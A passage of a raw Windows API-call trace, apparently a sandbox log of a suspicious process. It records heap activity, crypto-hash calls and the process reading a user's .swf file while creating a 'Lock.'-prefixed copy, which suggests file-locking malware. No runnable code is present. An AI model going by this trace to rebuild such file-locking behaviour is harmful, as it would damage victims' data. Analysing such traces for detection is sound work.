hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13d8 | out: hHeap=0x25c0000) returned 1 [0197.071] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ca8 [0197.071] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b13d8 [0197.072] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0197.072] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x11) returned 0x2466db0 [0197.072] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x2466db0, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyHash", lpUsedDefaultChar=0x0) returned 17 [0197.072] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ca8 | out: hHeap=0x25c0000) returned 1 [0197.072] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6b70 [0197.072] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466db0 | out: hHeap=0x25c0000) returned 1 [0197.072] GetProcAddress (hModule=0x74d40000, lpProcName="CryptDestroyHash") returned 0x74d4df66 [0197.072] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6b70 | out: hHeap=0x25c0000) returned 1 [0197.072] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13d8 | out: hHeap=0x25c0000) returned 1 [0197.072] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ca8 [0197.072] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b13d8 [0197.072] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13d8 | out: hHeap=0x25c0000) returned 1 [0197.072] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ca8 | out: hHeap=0x25c0000) returned 1 [0197.072] CryptDestroyHash (hHash=0xaa5660) returned 1 [0197.072] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x2416270 [0197.072] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13d8 [0197.072] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1758 [0197.072] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ca8 [0197.072] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fd8 [0197.072] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa110 [0197.072] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c28 [0197.072] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa110 | out: hHeap=0x25c0000) returned 1 [0197.073] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0197.073] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fd8 | out: hHeap=0x25c0000) returned 1 [0197.073] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fd8 [0197.073] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa110 [0197.073] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa920 [0197.073] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c28 [0197.073] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa920 | out: hHeap=0x25c0000) returned 1 [0197.073] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0197.073] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa110 | out: hHeap=0x25c0000) returned 1 [0197.073] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1768 | out: hHeap=0x25c0000) returned 1 [0197.073] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f78 | out: hHeap=0x25c0000) returned 1 [0197.073] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa878 | out: hHeap=0x25c0000) returned 1 [0197.073] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18a8 | out: hHeap=0x25c0000) returned 1 [0197.073] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e10 | out: hHeap=0x25c0000) returned 1 [0197.073] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa128 | out: hHeap=0x25c0000) returned 1 [0197.073] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d20 | out: hHeap=0x25c0000) returned 1 [0197.073] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f30 | out: hHeap=0x25c0000) returned 1 [0197.073] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b70 | out: hHeap=0x25c0000) returned 1 [0197.073] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e58 | out: hHeap=0x25c0000) returned 1 [0197.073] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa020 | out: hHeap=0x25c0000) returned 1 [0197.073] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e88 | out: hHeap=0x25c0000) returned 1 [0197.073] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6468 | out: hHeap=0x25c0000) returned 1 [0197.073] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ca8 | out: hHeap=0x25c0000) returned 1 [0197.073] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fd8 | out: hHeap=0x25c0000) returned 1 [0197.073] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13d8 | out: hHeap=0x25c0000) returned 1 [0197.074] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1758 | out: hHeap=0x25c0000) returned 1 [0197.074] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2416270 | out: hHeap=0x25c0000) returned 1 [0197.074] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f48 | out: hHeap=0x25c0000) returned 1 [0197.074] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9648 | out: hHeap=0x25c0000) returned 1 [0197.074] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1a0 | out: hHeap=0x25c0000) returned 1 [0197.074] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f60 | out: hHeap=0x25c0000) returned 1 [0197.074] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa170 | out: hHeap=0x25c0000) returned 1 [0197.074] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab340 | out: hHeap=0x25c0000) returned 1 [0197.074] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa230 | out: hHeap=0x25c0000) returned 1 [0197.074] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa188 | out: hHeap=0x25c0000) returned 1 [0197.074] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fc0 | out: hHeap=0x25c0000) returned 1 [0197.074] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d50 | out: hHeap=0x25c0000) returned 1 [0197.074] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ee8 | out: hHeap=0x25c0000) returned 1 [0197.074] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa968 | out: hHeap=0x25c0000) returned 1 [0197.074] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e40 | out: hHeap=0x25c0000) returned 1 [0197.074] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab328 | out: hHeap=0x25c0000) returned 1 [0197.074] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9bd0 | out: hHeap=0x25c0000) returned 1 [0197.074] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa908 | out: hHeap=0x25c0000) returned 1 [0197.074] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1b8 | out: hHeap=0x25c0000) returned 1 [0197.074] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8c0 | out: hHeap=0x25c0000) returned 1 [0197.074] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a95b8 | out: hHeap=0x25c0000) returned 1 [0197.074] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e28 | out: hHeap=0x25c0000) returned 1 [0197.074] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0197.074] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0197.074] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1758 [0197.074] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e28 [0197.075] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a95b8 [0197.075] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13d8 [0197.075] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13d8 | out: hHeap=0x25c0000) returned 1 [0197.075] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8c0 [0197.075] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13d8 [0197.075] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1b8 [0197.075] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa908 [0197.075] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18a8 [0197.075] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9bd0 [0197.075] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18a8 | out: hHeap=0x25c0000) returned 1 [0197.075] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9bd0 | out: hHeap=0x25c0000) returned 1 [0197.075] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa908 | out: hHeap=0x25c0000) returned 1 [0197.075] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1b8 | out: hHeap=0x25c0000) returned 1 [0197.075] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13d8 | out: hHeap=0x25c0000) returned 1 [0197.075] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1b8 [0197.075] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13d8 [0197.075] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13d8 | out: hHeap=0x25c0000) returned 1 [0197.075] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a95b8 | out: hHeap=0x25c0000) returned 1 [0197.075] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8c0 | out: hHeap=0x25c0000) returned 1 [0197.076] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1b8 | out: hHeap=0x25c0000) returned 1 [0197.076] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e28 | out: hHeap=0x25c0000) returned 1 [0197.076] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1758 | out: hHeap=0x25c0000) returned 1 [0197.076] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8a0 | out: hHeap=0x25c0000) returned 1 [0197.076] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa050 | out: hHeap=0x25c0000) returned 1 [0197.076] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9de0 | out: hHeap=0x25c0000) returned 1 [0197.076] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a08 | out: hHeap=0x25c0000) returned 1 [0197.076] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16f8 | out: hHeap=0x25c0000) returned 1 [0197.076] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a58 | out: hHeap=0x25c0000) returned 1 [0197.076] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b40 | out: hHeap=0x25c0000) returned 1 [0197.076] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c48 | out: hHeap=0x25c0000) returned 1 [0197.076] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249f1d0 | out: hHeap=0x25c0000) returned 1 [0197.076] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c38 | out: hHeap=0x25c0000) returned 1 [0197.076] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1368 | out: hHeap=0x25c0000) returned 1 [0197.076] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e10 | out: hHeap=0x25c0000) returned 1 [0197.076] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9288 | out: hHeap=0x25c0000) returned 1 [0197.076] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c38 | out: hHeap=0x25c0000) returned 1 [0197.076] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1748 | out: hHeap=0x25c0000) returned 1 [0197.076] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3cb8 | out: hHeap=0x25c0000) returned 1 [0197.076] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0c8 | out: hHeap=0x25c0000) returned 1 [0197.076] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6440 | out: hHeap=0x25c0000) returned 1 [0197.076] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1728 | out: hHeap=0x25c0000) returned 1 [0197.076] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a30 | out: hHeap=0x25c0000) returned 1 [0197.076] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c90 | out: hHeap=0x25c0000) returned 1 [0197.076] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d80 | out: hHeap=0x25c0000) returned 1 [0197.076] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f00 | out: hHeap=0x25c0000) returned 1 [0197.077] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9db0 | out: hHeap=0x25c0000) returned 1 [0197.077] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa7e8 | out: hHeap=0x25c0000) returned 1 [0197.077] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aca50 | out: hHeap=0x25c0000) returned 1 [0197.077] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466df0 | out: hHeap=0x25c0000) returned 1 [0197.077] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17a8 | out: hHeap=0x25c0000) returned 1 [0197.077] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2416490 | out: hHeap=0x25c0000) returned 1 [0197.077] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ea0 | out: hHeap=0x25c0000) returned 1 [0197.077] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3bc8 | out: hHeap=0x25c0000) returned 1 [0197.077] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16c8 | out: hHeap=0x25c0000) returned 1 [0197.077] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3ad8 | out: hHeap=0x25c0000) returned 1 [0197.077] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9cc0 | out: hHeap=0x25c0000) returned 1 [0197.077] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c10 | out: hHeap=0x25c0000) returned 1 [0197.077] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1878 | out: hHeap=0x25c0000) returned 1 [0197.077] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c60 | out: hHeap=0x25c0000) returned 1 [0197.077] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9af8 | out: hHeap=0x25c0000) returned 1 [0197.077] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6af8 | out: hHeap=0x25c0000) returned 1 [0197.077] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1698 | out: hHeap=0x25c0000) returned 1 [0197.077] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6cb0 | out: hHeap=0x25c0000) returned 1 [0197.077] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9570 | out: hHeap=0x25c0000) returned 1 [0197.077] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6aa8 | out: hHeap=0x25c0000) returned 1 [0197.077] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1788 | out: hHeap=0x25c0000) returned 1 [0197.077] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b56a8 | out: hHeap=0x25c0000) returned 1 [0197.077] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aaec0 | out: hHeap=0x25c0000) returned 1 [0197.077] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3ce0 | out: hHeap=0x25c0000) returned 1 [0197.077] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17e8 | out: hHeap=0x25c0000) returned 1 [0197.077] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c88 | out: hHeap=0x25c0000) returned 1 [0197.078] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9eb8 | out: hHeap=0x25c0000) returned 1 [0197.078] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18c8 | out: hHeap=0x25c0000) returned 1 [0197.078] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0197.078] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9cd8 | out: hHeap=0x25c0000) returned 1 [0197.078] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9df8 | out: hHeap=0x25c0000) returned 1 [0197.078] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0197.078] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1468 [0197.078] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0197.078] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0197.078] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0197.078] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1468 [0197.078] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f18 [0197.078] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa278 [0197.078] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2da8 [0197.078] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d98 [0197.079] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz/AppData/Roaming/e-h1xk7cgYR.swf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\e-h1xk7cgyr.swf"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x294 [0197.079] SetFilePointerEx (in: hFile=0x294, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0197.079] SetFilePointerEx (in: hFile=0x294, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x8bf2c8 | out: lpNewFilePointer=0x0) returned 1 [0197.079] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x14) returned 0x2466df0 [0197.079] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0197.079] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17b8 [0197.079] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0197.079] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0197.079] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17b8 [0197.079] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9dc8 [0197.079] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa260 [0197.079] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1468 [0197.079] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f18 [0197.079] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz/AppData/Roaming/Lock.e-h1xk7cgYR.swf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\lock.e-h1xk7cgyr.swf"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x268 [0197.086] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x14) returned 0x2466e10 [0197.086] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0197.086] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1818 [0197.087] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0197.087] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0197.087] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d7a0 [0197.087] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0197.087] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1818 [0197.087] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0e0 [0197.087] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa080 [0197.087] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17b8 [0197.087] SetFilePointerEx (in: hFile=0x294, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x8bf4ec | out: lpNewFilePointer=0x0) returned 1 [0197.087] ReadFile (in: hFile=0x294, lpBuffer=0x24b7a48, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8bf500, lpOverlapped=0x0 | out: lpBuffer=0x24b7a48*, lpNumberOfBytesRead=0x8bf500*=0x77a7, lpOverlapped=0x0) returned 1 [0197.088] ReadFile (in: hFile=0x294, lpBuffer=0x24b7a48, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8bf500, lpOverlapped=0x0 | out: lpBuffer=0x24b7a48*, lpNumberOfBytesRead=0x8bf500*=0x0, lpOverlapped=0x0) returned 1 [0197.089] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0197.089] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17b8 [0197.089] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0b0 [0197.089] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa158 [0197.089] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1818 [0197.089] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18c8 [0197.089] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x77a7) returned 0x34a2048 [0197.089] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0197.089] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17b8 [0197.089] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18c8 [0197.089] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466db0 [0197.089] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0197.089] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17b8 [0197.089] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c88 [0197.089] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18c8 [0197.089] CharUpperBuffW (in: lpsz="A6000504F44", cchLength=0xb | out: lpsz="A6000504F44") returned 0xb [0197.089] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c88 | out: hHeap=0x25c0000) returned 1 [0197.089] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18c8 | out: hHeap=0x25c0000) returned 1 [0197.089] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0b0 [0197.089] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1) returned 0x24b18c8 [0197.089] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa158 [0197.089] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0e0 [0197.089] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1818 